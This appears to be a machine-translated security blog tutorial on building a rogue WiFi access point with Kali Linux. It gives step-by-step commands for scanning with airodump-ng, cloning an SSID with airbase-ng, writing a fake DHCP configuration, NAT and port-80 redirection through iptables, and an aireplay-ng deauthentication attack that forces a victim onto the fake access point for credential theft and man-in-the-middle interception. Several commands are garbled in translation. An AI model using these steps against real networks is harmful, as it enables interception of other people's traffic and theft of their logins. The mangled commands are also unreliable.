Technology sharing: The entry posture for WiFi fishing

Brief introduction

The experiment first builds a test environment, then creates a fake wireless access point, connects the network connection to the fake access point and forces the user to connect to the fake wireless point.

Prepare beforehand

1. Wireless Card: The wireless card is used for sniffing and injecting packets.

2. Backtrack or Kali Linux: attack platform

3. Wireless network: Ensure that the wireless is used by the user and can control this wireless access point.

4. A target machine: This machine can be either your physical machine or a virtual machine. In this experiment, a Windows 7 virtual machine was used

Start the experiment: Create a rogue access point first step:

Start the virtual machine and choose Kali Linux. Click "Edit Virtual machine settings" to go to the "Network Adapter" option and select "Bridge (Bridged)" In the network connection:

Step Two:

Open Kali log in with the root account.

Step Three:

Connect your laptop's wireless card. Make sure that the Wireless card option under the Removable devices option has a blue pair of hooks in front of it. If not, you need to select a wireless card to disconnect the wireless card from the Windows system and connect to the Kali Linux virtual machine as shown in:

Fourth Step:

Open the terminal and enter the following command to check the IP address and gateway.

In this example, the gateway is 192.168.0.1

Fifth Step:

First, use the following command to list all NIC lists, such as:

Can see a name is Wlan5 's network card, this is it.

Sixth step:

Check that the wireless APs near the user are available, using the following command, as follows:

airodump-ng wlan5

This command will start capturing the packet and list the access points near the user, where Bssid is the MAC address of the wireless AP and the channel represents the frequency. Note the value of the PWR column, the closer the router is, the smaller the value.

Seventh Step:

Note the BSSID and channel values of the AP points. Also, note the MAC address of the target device.

In this example, the Bissid value is the value of 5e:f9:6a:29:28:18,channel is 2. The MAC address of the target machine is 68:5d:43:7d:f7:e9

Eighth Step:

We have to build a fake DHCP server to provide a fake AP access point. You can create a DHCP by executing the following command in Kali:

install isc-dhcp-server

Once established, modify the DHCP configuration file as follows:

/etc/dhcpd.conf

authoraitative;default-lease-time 600;max-lease-time 7200;subnet 192.168.1.0 netmask 255.255.255.0 {option routers 192.168.1.1;option subnet-mask 255.255.255.0;option domain-name “Epson_Printer”;option domain-name-servers 192.168.1.1;range 192.168.1.2 192.168.1.40;}

Save and close the configuration file.

Repeat the above for the/etc/dhcpd/dhcpd.conf file.

Nineth Step:

Open Terminal, execute the following command, create a Essid name and the victim access AP Similar AP access point, in the example we use "Epson_printer".

airbase-ng –e Epson_Printer -c 2 wlan5

L e is the Essid (MAC address) of the AP access point

L c is the frequency of the wireless network

L WLAN5 is the NIC name

Now, the new AP access point named "Epson_printer" is created.

Tenth step:

Now, we open a new terminal, start monitoring this fishing AP, execute the following command:

airodump-ng –bssid 00:C0:CA:70:8F:25 -C 2 wlan 5 

11th Step:

Check the resulting window of the fifth step, the new AP access point should be visible:

12th Step:

Now, we have to provide this fake wireless AP to the network. Open the terminal and enter the following command in turn:

·  Ifconfig at0 192.168.1.1 netmask 255.255.255.0  Ifconfig at0 MTU 1400 ·  Route add-net 192.168.1.0 netmask 255.255.255.0 GW 192.168.1.1 iptables–Flush iptables–Table nat–Flush iptables–delete-Chain iptables–Table nat–delete-Chain Echo1 >/proc/Sys/net/ipv4/ip_forward Iptables-T nat-a prerouting-P Udp-j dnat–To192.168.0.1 (Gateway)   iptables-p FORWARD accept   iptables–append forward–in-interface at0-j accept   iptables–table Nat–append postrouting–out-interface eth0-j MASQUERADE·   iptables-t nat-a prerouting-p tcp–destination-port Span class= "Hljs-number" >80-j redirect–to-port 10000·  DHCPD-CF/ETC/DHCP/DHCPD.CONF-PF/var/run/dhcpd.pid at0  /etc/init.d/isc-dhcp-server start 
   

13th Step:

We can wait for someone to connect to the fake wireless AP, or we can force our target to reconnect to the AP with a de-authenticate attack, so we can grab the bag.

We can do this with the following command:

aireplay-ng –deauth 0 -a 5E:F9:6A:29:28:18 -c 68:5D:43:7D:F7:E9 wlan5

5e:f9:6a:29:28:18 is the MAC address of the wireless AP

0 represents the De-authentication.

-C is the MAC address of the target machine

Wlan5 is the NIC

As can be seen in the following, the wireless network card is sending de-authentication packets to the target wireless AP. The target machine is disconnected from the "epson_printer" connection point and starts trying to reconnect, such as:

14th Step:

Due to the continuous sending of the Deauth packet, the client has been unable to connect to the original wireless APs, so began to try to connect the other strongest wireless APs, our false AP signal is strong, and began to connect. Such as:

15th Step:

View the Airodump-ng command window. You can view connected devices in the terminal:

Now, the victim's device is connected to our fake wireless AP. From here, attackers can implement various means, such as DNS to trick users into connecting to a fake website, acquiring user authentication information, or using SSLstrip and ettercap for man-in-the-middle attacks.

Finally: This is a bit basic, we can see it. Light Spray (づ￣3￣) づ╭?~

* Reference Source: RESOURCES.INFOSECINSTITUTE,FB Small series of two doors Edison Chen compiled, reproduced please indicate from FREEBUF hackers and Geeks (freebuf.com)

Technology sharing: The entry posture for WiFi fishing